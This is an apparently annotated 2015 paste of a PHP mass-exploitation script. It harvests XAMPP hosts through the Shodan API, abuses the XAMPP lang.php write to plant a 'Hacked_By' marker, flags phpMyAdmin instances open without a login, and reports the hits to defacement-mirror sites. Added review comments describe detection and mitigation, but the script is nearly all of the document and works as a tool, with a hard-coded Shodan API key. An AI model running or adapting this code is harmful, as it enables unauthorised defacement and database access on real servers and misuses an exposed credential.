shor7cut

Auto Exploit : Lang dan Phpmyadmin [Final]

Jul 26th, 2015
  1. <?php
  // Review note: these calls configure the run and then start the scanner.
  // error_reporting(0) hides every PHP warning and notice, so failed file and
  // network calls further down produce no output.
  2. error_reporting(0);
  // Removes the execution time limit, so the script runs until it exits or is stopped.
  3. set_time_limit(0);
  // Time zone used by the date() timestamps that end up in the report file.
  4. date_default_timezone_set('asia/jakarta');
  // Entry point: the scan starts as soon as the file is executed.
  5. shor7cut_scanner();
  6.  
  7. /* ------- FUNCTION: FETCH TARGET DATA AND EXECUTE -----*/
  /*
   * Review note, written for defenders analysing this paste.
   *
   * What the function does, in order:
   *   1. Prints a banner, then exits if $conf_irm is "FALSE" or if phpversion()
   *      compares <= "5.3.0" (a plain string comparison, not version_compare()).
   *   2. Reads the Shodan account profile and, for every string in $dork, calls the
   *      Shodan host-search API and appends each match's ip_str to $nama_file_target.
   *   3. For each stored address, requests /xampp/lang.php with a
   *      "Hacked_By_<name>" query string and /phpmyadmin/querywindow.php.
   *   4. Counts a response containing "Hacked_By_" as a vulnerable XAMPP host and
   *      hands it to submit_mirror() and simpan_result_xampp(); counts a phpMyAdmin
   *      page that has a token field but no "pma_password" string as open.
   *   5. Appends the totals to $nama_laporan and calls reload(), which runs the
   *      whole function again.
   *
   * Detection: in web-server access logs, look for requests to the lang.php paths
   * built below (/xampp/lang.php, /security/lang.php) whose query string starts
   * with "Hacked_By_", and for /phpmyadmin/querywindow.php fetched by clients that
   * never authenticated. The tool reports the matching lang.tmp URL as its proof,
   * so that file is presumably where the marker ends up; verify on an affected host.
   * Mitigation: the XAMPP pages and phpMyAdmin are administration interfaces of a
   * development stack. Keep them off public interfaces or behind authentication.
   *
   * eregi() is used below; it was removed in PHP 7.0, so the script as pasted
   * targets a PHP 5.x runtime.
   */
  8. function shor7cut_scanner(){
  9. /* ------- CONFIG -----*/
  // NOTE(review): a Shodan API key is hard-coded in a public paste. Treat it as
  // exposed; its owner should revoke it.
  10. $api_key="z3cBefrV3bmRx2rNZ0E1opuZxXNPrbIR";
  // Handle and team name; $nama_hacker is embedded in the request marker and both
  // are passed to submit_mirror().
  11. $nama_hacker="Shor7cut";
  12. $nama_team="IndoXploit";
  // Local artefacts created in the working directory of the machine running the tool.
  13. $nama_file_target = "target-bu7sec.txt";
  14. $nama_laporan="Laporan.txt";
  // Deletes the target list left by a previous run. On a first run the file does
  // not exist; the resulting warning is hidden by error_reporting(0).
  15. unlink($nama_file_target);
  16. $nama_ouput_result_xampp="BUG7SEC-XAMPP.HTML"; // Use file type (*.HTML)
  17. $nama_ouput_result_phpmyadmin="BUG7SEC-PHPMYD.HTML"; // Use file type (*.HTML)
  18. $nama_log_xampp_lang="xampp.log7sec"; // SO THAT THE SAME DATA IS NOT SAVED TWICE // use .log7sec only
  19. $nama_log_xampp_phpmyadmin="phpmyadmin.log7sec"; // SO THAT THE SAME DATA IS NOT SAVED TWICE // use .log7sec only
  20. $conf_irm = "TRUE"; // TRUE or FALSE (once all config values are filled in, change this to TRUE)
  21. $versi_php = phpversion();
  // Counters used only for the progress lines and the final report.
  22. $no=1;
  23. $no_target=1;
  24. $total_target=0;
  25. $total_xampp_vuln=0;
  26. $total_phpmyadmin_vuln=0;
  27. $waktu_start=date("d-m-Y h:i:sa");
  28. /* ------- CONFIG:END -----*/
  // $logos is first touched with .=, so it starts out undefined (notice suppressed).
  29. $logos.="\r\n------------------------------------------------------------\r\n";
  30. $logos.=" _________.__ _________ __ \r\n";
  31. $logos.=" / _____/| |__ __________\______ \ ____ __ ___/ |_ \r\n";
  32. $logos.=" \_____ \ | | \ / _ \_ __ \ / // ___\| | \ __\ \r\n";
  33. $logos.=" / \| Y ( <_> ) | \/ / /\ \___| | /| | \r\n";
  34. $logos.=" /_______ /|___| /\____/|__| /____/ \___ >____/ |__| \r\n";
  35. $logos.=" \/ \/ [ MULTY K.I.L.L.E.R ] \/ \r\n";
  36. $logos.="-------------------------------------------------------------\r\n";
  37. echo $logos;
  // Guard: stop when the operator has left the config flag at "FALSE".
  38. if($conf_irm=="FALSE"){
  39. echo "[PERINGATAN] -> Ops.. Config error\r\n";
  40. exit();
  41. }
  // Guard: stop on old runtimes. This compares two strings, not version numbers.
  42. if($versi_php<="5.3.0"){
  43. echo "Ops... Silahkan Upgrade versi PHP anda.\r\n";
  44. exit();
  45. }
  46.  
  // Search strings sent to Shodan: the word "xampp" alone or combined with an
  // Apache or PHP version banner.
  47. $dork = array (
  48. 'xampp',
  49. 'xampp Apache/2.2.3',
  50. 'xampp Apache/2.2.4',
  51. 'xampp Apache/2.2.6',
  52. 'xampp Apache/2.2.8',
  53. 'xampp Apache/2.2.9',
  54. 'xampp Apache/2.2.11',
  55. 'xampp Apache/2.2.12',
  56. 'xampp Apache/2.2.14',
  57. 'xampp Apache/2.2.17',
  58. 'xampp Apache/2.2.21',
  59. 'xampp Apache/2.4.2',
  60. 'xampp Apache/2.4.3',
  61. 'xampp Apache/2.4.10',
  62. 'xampp Apache/2.4.12',
  63. 'xampp PHP/5.2.1',
  64. 'xampp PHP/5.2.2',
  65. 'xampp PHP/5.2.3',
  66. 'xampp PHP/5.2.4',
  67. 'xampp PHP/5.2.5',
  68. 'xampp PHP/5.2.6',
  69. 'xampp PHP/5.2.8',
  70. 'xampp PHP/5.2.9',
  71. 'xampp PHP/5.3.0',
  72. 'xampp PHP/5.3.1',
  73. 'xampp PHP/5.3.5',
  74. 'xampp PHP/5.3.8',
  75. 'xampp PHP/5.4.4',
  76. 'xampp PHP/5.4.7',
  77. 'xampp PHP/5.4.31',
  78. 'xampp PHP/5.5.15',
  79. 'xampp PHP/5.5.19',
  80. 'xampp PHP/5.6.3',
  81. 'xampp PHP/5.5.24',
  82. 'xampp PHP/5.6.8',
  83. 'xampp PHP/4.4.5',
  84. 'xampp PHP/4.4.6',
  85. 'xampp PHP/4.4.7',
  86. 'xampp PHP/4.4.8',
  87. 'xampp PHP/4.4.9'
  88. ); $total_dork = count($dork);
  89. echo proses("halaman_depan");
  // Account lookup; the API key is sent in the URL query string.
  90. $get = file_get_contents("https://api.shodan.io/account/profile?key={$api_key}");
  91. $json = json_decode($get,true);
  92. echo proses("halaman_info");
  // Prints the account's display name and remaining credits as returned by the API.
  93. $status_akun .="--------------------------------\r\n";
  94. $status_akun .="-> Nama : ".$json['display_name']."\r\n";
  95. $status_akun .="-> SALDO : ".$json['credits']."\r\n";
  96. $status_akun .="-> INFO : ".count($dork)." DORK\r\n";
  97. $status_akun .="--------------------------------\r\n";
  98. echo $status_akun;
  99. echo proses("mencari_target");
  100. /* FIND TARGETS AND SAVE THEM */
  // One search request per $dork entry. Every returned ip_str is appended to the
  // target file, separated by "|", so the whole list ends up on a single line.
  101. foreach ($dork as $dorks) {
  102. $get = file_get_contents("https://api.shodan.io/shodan/host/search?key={$api_key}&query={$dorks}");
  103. $json = json_decode($get,true);
  104. $target_live = $json['total'];
  105. foreach ($json['matches'] as $key => $value) {
  106.  
  107. $fp = fopen($nama_file_target, 'a+');
  108. fwrite($fp, $value['ip_str']."|");
  109. fclose($fp);
  110.  
  111. }
  // The running total counts at most 100 hosts per query, whatever 'total' says.
  112. if($target_live>100){
  113. $target_live=100;
  114. }
  115. $total_target=$target_live+$total_target;
  116. echo "[CARI TARGET] -> $no of $total_dork [Live Target : $target_live | Total Target : $total_target]\r\n";
  117. $no++;
  118. }
  119. echo "[INFO] Total Target : $total_target\r\n";
  120. /* EXECUTE AGAINST TARGETS*/
  121. echo proses("loading_target");
  // Reads the single line written above and splits it back into addresses.
  122. $buka_file = fopen($nama_file_target, "r");
  123. $baca_file = fgets($buka_file);
  124. $target = explode("|", $baca_file);
  125. echo proses("loading_eksekusi");
  126. foreach ($target as $sites) {
  // URLs are built from the bare address with no scheme. The query string carries
  // the "Hacked_By_<name>" marker that the checks below search for, which also
  // makes it the string to search for in access logs.
  127. $format_url_1 = "$sites/xampp/lang.php?Hacked_By_$nama_hacker";
  128. $format_url_2 = "$sites/security/lang.php?Hacked_By_$nama_hacker";
  129. $patch_result1 = "$sites/xampp/lang.tmp?";
  130. $patch_result2 = "$sites/security/lang.tmp?";
  131. $phpmyadmin_url = "$sites/phpmyadmin/querywindow.php";
  132.  
  // Three GET requests per host. No CURLOPT_USERAGENT is set on these handles;
  // redirects are followed and each transfer is limited to 30 seconds.
  133. $curl_xampp_1 = curl_init($format_url_1);
  134. curl_setopt($curl_xampp_1, CURLOPT_FAILONERROR, true);
  135. curl_setopt($curl_xampp_1, CURLOPT_FOLLOWLOCATION, true);
  136. curl_setopt($curl_xampp_1, CURLOPT_RETURNTRANSFER, true);
  137. curl_setopt($curl_xampp_1, CURLOPT_CONNECTTIMEOUT ,0);
  138. curl_setopt($curl_xampp_1, CURLOPT_TIMEOUT, 30);
  139. $result_xampp_1 = curl_exec($curl_xampp_1);
  140.  
  141. $curl_xampp_2 = curl_init($format_url_1);
  142. curl_setopt($curl_xampp_2, CURLOPT_FAILONERROR, true);
  143. curl_setopt($curl_xampp_2, CURLOPT_FOLLOWLOCATION, true);
  144. curl_setopt($curl_xampp_2, CURLOPT_RETURNTRANSFER, true);
  145. curl_setopt($curl_xampp_2, CURLOPT_CONNECTTIMEOUT ,0);
  146. curl_setopt($curl_xampp_2, CURLOPT_TIMEOUT, 30);
  147. $result_xampp_2 = curl_exec($curl_xampp_2);
  148.  
  149.  
  150. $phpmyn = curl_init("$phpmyadmin_url");
  151. curl_setopt($phpmyn, CURLOPT_FAILONERROR, true);
  152. curl_setopt($phpmyn, CURLOPT_FOLLOWLOCATION, true);
  153. curl_setopt($phpmyn, CURLOPT_RETURNTRANSFER, true);
  154. curl_setopt($phpmyn, CURLOPT_CONNECTTIMEOUT ,0);
  155. curl_setopt($phpmyn, CURLOPT_TIMEOUT, 30);
  156. $phpmynresult = curl_exec($phpmyn);
  157.  
  158.  
  159.  
  160. echo "[Scan Target]-> TARGET : $sites <$no_target/$total_target>\r\n";
  // A host is counted as affected when the response body contains the marker.
  // $phpmyadmin_status is never assigned in this function, so echoing it prints nothing.
  161. if(eregi("Hacked_By_",$result_xampp_1))
  162. {
  163. echo "[Scan Target]-> XAMPP : vulnerability | xampp/lang.tmp\r\n";
  164. echo $phpmyadmin_status;
  165. echo "[Scan Target]-> MIRROR : ".submit_mirror($patch_result1,$nama_hacker,$nama_team);
  166. echo "[Scan Target]-> Database : ".simpan_result_xampp($patch_result2,$nama_ouput_result_xampp,$nama_log_xampp_lang);
  167. $total_xampp_vuln++;
  168. }
  169. else if(eregi("Hacked_By_",$result_xampp_2))
  170. {
  171. echo "[Scan Target]-> XAMPP : vulnerability | security/lang.tmp\r\n";
  172. echo $phpmyadmin_status;
  173. echo "[Scan Target]-> MIRROR : ".submit_mirror($patch_result2,$nama_hacker,$nama_team);
  174. echo "[Scan Target]-> Database : ".simpan_result_xampp($patch_result2,$nama_ouput_result_xampp,$nama_log_xampp_lang);
  175. $total_xampp_vuln++;
  176. }else {
  177. echo $phpmyadmin_status;
  178. echo "[Scan Target]-> XAMPP : Not vulnerability\r\n";
  179. }
  180.  
  // phpMyAdmin check: a hidden "token" input means the page rendered. If the page
  // also contains "pma_password" it is treated as a login form, otherwise as an
  // instance reachable without authentication and recorded.
  181. $re = "/<input type=\"hidden\" name=\"token\" value=\"(.*)\"/";
  182. if(preg_match($re, $phpmynresult, $matches)){
  183. if(preg_match_all("/pma_password/", $phpmynresult, $matx)){
  184. echo "[Scan Target]->PhpMyadmin : Not vulnerable (Auth)\r\n\n";
  185. }else {
  186. echo "[Scan Target]->PhpMyadmin : vulnerable\r\n";
  187. echo "[Scan Target]->PhpMyadminDB : ".simpan_result_phpmyadmin($phpmyadmin_url,$nama_ouput_result_phpmyadmin,$nama_log_xampp_phpmyadmin);
  188. $total_phpmyadmin_vuln++;
  189. }
  190. }else {
  191. echo "[Scan Target]->PhpMyadmin : Not vulnerable\r\n\n";
  192. }
  193.  
  194.  
  // Flushes output and waits two seconds before the next host.
  195. flush();
  196. ob_flush();
  197. sleep(2);
  198. $no_target++;
  199. }
  200.  
  // Summary appended to the report file; $lapor also starts out undefined.
  201. $lapor.="\r\n\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n";
  202. $lapor.="-> SCAN START - END : ".$waktu_start."/".date("d-m-Y h:i:sa")."\r\n";
  203. $lapor.="-> Total Target : ".$total_target."\r\n";
  204. $lapor.="-> Total Xampp Vuln : ".$total_xampp_vuln."\r\n";
  205. $lapor.="-> Total PHPMYADMIN Vuln : ".$total_phpmyadmin_vuln."\r\n";
  206. $lapor.="\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n";
  207. $fp = fopen($nama_laporan, 'a+');
  208. fwrite($fp, $lapor);
  209. fclose($fp);
  210.  
  // reload() calls this function again, so a finished pass starts the next one.
  211. reload(); // reload the weapon
  212.  
  213. } /* END OF FUNCTION*/
  /**
   * Start another scan pass by calling shor7cut_scanner().
   *
   * shor7cut_scanner() ends by calling reload(), so the two functions keep calling
   * each other. The only exits visible on this page are the exit() calls at the top
   * of shor7cut_scanner().
   */
  function reload()
  {
      shor7cut_scanner();
  }
  217.  
  218.  
  /*
   * Review note: reports one URL to two external sites and returns a status string.
   * The caller prints the result under the label "MIRROR", so these are apparently
   * defacement-mirror submission endpoints.
   *
   * $sites        host/path string; "http://" is prepended to form the reported URL
   * $nama_hacker  name sent in the "hacker" field
   * $nama_team    team name; only placed in $post
   * Returns       "Zone-DB [OK|FAIL] | Aljyyosh [OK|Fail]\r\n"
   *
   * Indicators on the machine running the tool: outbound HTTP requests to
   * zone-db.com/notify_act.php and aljyyosh.org/single.php, and a relative cookie
   * file path "coker_log" handed to curl.
   */
  219. function submit_mirror($sites,$nama_hacker,$nama_team){
  220. $url = "http://$sites";
  // $post is built here but not referenced again in this function.
  221. $post = array(
  222. "hacker" => "$nama_hacker",
  223. "team" => "$nama_team",
  224. "url" => "$url",
  225. "poc" => "Other Web Application Bug",
  226. "key" => "kucing",
  227. "secret" => "tai",
  228. );
  // First request: zone-db.com. Certificate and host-name verification are switched
  // off, although the URL is plain http; a fixed mobile Safari User-Agent is sent.
  229. $cubits = curl_init ("http://zone-db.com/notify_act.php");
  230. curl_setopt($cubits, CURLOPT_HEADER, 1);
  231. curl_setopt($cubits, CURLOPT_FOLLOWLOCATION, 1);
  232. curl_setopt($cubits, CURLOPT_RETURNTRANSFER, 1);
  233. curl_setopt($cubits, CURLOPT_SSL_VERIFYPEER, 0);
  234. curl_setopt($cubits, CURLOPT_SSL_VERIFYHOST, 0);
  235. curl_setopt($cubits,CURLOPT_TIMEOUT,10);
  236. curl_setopt($cubits,CURLOPT_USERAGENT, "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16");
  237. curl_setopt($cubits, CURLOPT_AUTOREFERER, true);
  238. curl_setopt($cubits, CURLOPT_COOKIEJAR, "coker_log");
  239. curl_setopt($cubits, CURLOPT_COOKIEFILE, "coker_log");
  240. $result_mirror = curl_exec($cubits);
  241.  
  // Success is judged by the word "added" anywhere in the response (case-insensitive).
  // $status_zonedb is first touched with .=, so it starts out undefined.
  242. if (preg_match("#added#is", $result_mirror)){
  243. $status_zonedb.= "Zone-DB [OK] | ";
  244. }else{
  245. $status_zonedb.= "Zone-DB [FAIL] | ";
  246. }
  // Second request: a POST to aljyyosh.org with a fixed cookie. $nama_hacker and
  // $url are placed in the body without URL-encoding.
  247. $cubit = curl_init ();
  248. curl_setopt ($cubit, CURLOPT_RETURNTRANSFER, 1);
  249. curl_setopt ($cubit, CURLOPT_POST, 1);
  250. curl_setopt ($cubit, CURLOPT_URL, "http://aljyyosh.org/single.php");
  251. curl_setopt ($cubit, CURLOPT_COOKIE, "alj=aljyyosh");
  252. curl_setopt ($cubit, CURLOPT_POSTFIELDS, "hacker=$nama_hacker&site=$url&how=1&why=1&addsite=Send");
  253. if (preg_match ("/<font color=red> OK<\/font>/", curl_exec ($cubit))){
  254. $status_zonedb.= "Aljyyosh [OK]\r\n";
  255. }else {
  256. $status_zonedb.= "Aljyyosh [Fail]\r\n";
  257. }
  258. return $status_zonedb;
  259. }
  260.  
  /*
   * Review note: records one XAMPP hit on local disk, skipping entries already logged.
   *
   * $sites                    host/path string to record
   * $nama_ouput_result_xampp  HTML file that receives an <a> link per new entry
   * $nama_log_xampp_lang      plain-text log used for the duplicate check
   * Returns                   "Telah Disimpan\r\n" when written, "Tidak Tersimpan\r\n"
   *                           when the entry was already in the log.
   *
   * Both files are forensic artefacts on the machine that ran the tool: they list
   * the hosts it recorded. eregi() was removed in PHP 7.0, so this function only
   * runs on PHP 5.x.
   */
  261. function simpan_result_xampp($sites,$nama_ouput_result_xampp,$nama_log_xampp_lang){
  // Returns false while the log file does not exist yet (warning suppressed globally).
  262. $buka_log_xampp = file_get_contents($nama_log_xampp_lang);
  // $sites is placed in the HTML without escaping.
  263. $hasil = '<a href="http://'.$sites.'" target="_blank">'.$sites.'</a><br>';
  264. $hasil_log = "http://".$sites."\r\n";
  // Duplicate check: $sites is used as the regular-expression pattern, not as a literal.
  265. if(!eregi($sites, $buka_log_xampp)){
  266. // save the result
  267. $fp = fopen($nama_ouput_result_xampp, 'a+');
  268. fwrite($fp, $hasil);
  269. fclose($fp);
  270. // save the result to the log
  271. $fp = fopen($nama_log_xampp_lang, 'a+');
  272. fwrite($fp, $hasil_log);
  273. fclose($fp);
  // .= on a variable that has not been assigned yet in this function.
  274. $status_simpan.="Telah Disimpan\r\n";
  275. }else {
  276. $status_simpan="Tidak Tersimpan\r\n";
  277. }
  278. return $status_simpan;
  279. }
  280.  
  /*
   * Review note: records one phpMyAdmin hit on local disk, skipping entries already
   * logged. Same logic as simpan_result_xampp(), with its own output and log files.
   *
   * $sites                         URL string (without scheme) to record
   * $nama_ouput_result_phpmyadmin  HTML file that receives an <a> link per new entry
   * $nama_log_xampp_phpmyadmin     plain-text log used for the duplicate check
   * Returns                        "Telah Disimpan\r\n\n" when written,
   *                                "Tidak Tersimpan\r\n\n" when already in the log.
   *
   * Both files are forensic artefacts on the machine that ran the tool. eregi() was
   * removed in PHP 7.0, so this function only runs on PHP 5.x.
   */
  281. function simpan_result_phpmyadmin($sites,$nama_ouput_result_phpmyadmin,$nama_log_xampp_phpmyadmin){
  // Returns false while the log file does not exist yet (warning suppressed globally).
  282. $buka_log_xampp = file_get_contents($nama_log_xampp_phpmyadmin);
  // $sites is placed in the HTML without escaping.
  283. $hasil = '<a href="http://'.$sites.'" target="_blank">'.$sites.'</a><br>';
  284. $hasil_log = "http://".$sites."\r\n";
  // Duplicate check: $sites is used as the regular-expression pattern, not as a literal.
  285. if(!eregi($sites, $buka_log_xampp)){
  286. // save the result
  287. $fp = fopen($nama_ouput_result_phpmyadmin, 'a+');
  288. fwrite($fp, $hasil);
  289. fclose($fp);
  290. // save the result to the log
  291. $fp = fopen($nama_log_xampp_phpmyadmin, 'a+');
  292. fwrite($fp, $hasil_log);
  293. fclose($fp);
  294. $status_simpan="Telah Disimpan\r\n\n";
  295. }else {
  296. $status_simpan="Tidak Tersimpan\r\n\n";
  297. }
  298. return $status_simpan;
  299. }
  300.  
  301.  
  /**
   * Print the progress banner for one stage of the run.
   *
   * For a known stage key the banner text is echoed, followed by three dots printed
   * one second apart and the stage's line ending. Unknown keys print nothing.
   * Nothing is returned; callers that echo the result therefore add no output.
   *
   * @param string $status Stage key: mencari_target, halaman_depan, halaman_info,
   *                       loading_target or loading_eksekusi.
   */
  function proses($status){
      // stage key => array(banner text, line ending printed after the dots)
      $stages = array(
          'mencari_target'   => array("INFO-> Mencari Target ", "\r\n\n"),
          'halaman_depan'    => array("INFO-> Mohon menunggu ", "\r\n"),
          'halaman_info'     => array("INFO-> Mengambil data API ", "\r\n"),
          'loading_target'   => array("INFO-> Memuat Target ", "\r\n"),
          'loading_eksekusi' => array("INFO-> Mulai mengeksekusi Target ", "\r\n\n"),
      );

      foreach ($stages as $key => $parts) {
          // Loose comparison in table order, matching what a switch statement does.
          if ($status == $key) {
              echo $parts[0];
              $dots = 0;
              while ($dots < 3) {
                  echo ".";
                  sleep(1);
                  $dots++;
              }
              echo $parts[1];
              return;
          }
      }
  }
  354.  
  355. ?>